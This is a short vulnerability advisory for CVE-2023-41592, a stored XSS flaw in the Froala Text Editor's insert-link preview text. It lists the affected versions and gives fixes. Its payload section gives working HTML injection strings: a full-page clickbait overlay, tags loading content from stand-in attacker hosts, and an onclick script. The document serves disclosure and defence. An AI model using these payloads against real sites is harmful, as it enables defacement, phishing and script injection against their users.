Descriptions (CVE-2023-41592)

A vulnerability XSS was found in Froala Text Editor version 4.0.1 up to 4.1.1.
It has been classified as critical; the affected item is the insert link component.
It is possible to manipulate the preview text when inserting a link in the document, allowing the insertion of XSS codes.
In a scenario where the content typed in the editor is stored in a table, an XSS Storage attack vector opens.
NOTE: The vendor was contacted early about this disclosure.

Examples of Payloads

              
                <b<button style="width:100vw; height:100vh; background: white; top:0 !important; left:0 !important; z-index:999 !important; border:none; background-image:url(https://porn-content.com/image.jpg) !important; background-repeat:no-repeat !important; background-position:center center !important;">Click Here $$</button>
                <i<img src='malicious-site.com'>
                <s<svg src='malicious-site.com'>
                <i<input type=image src='malicious-site.com'>
                <i<frame src='https://hacker.soarescorp.com/tools/pages/hacked.html'>
                <o<object></object>
                <d<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)" ></div>
                
              
            

References

Vulnerabilitie found by: LUCAS 5O4R3S

Mitre

You can view this CVE on the official Miter website, just access the link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41592

How to fix?

To avoid being exposed to this vulnerability, you can make the following adjustments:
- Update the editor component to versions above 4.1.1
- Use javascript code to remove any html or XSS tags that exist within the <a> tags.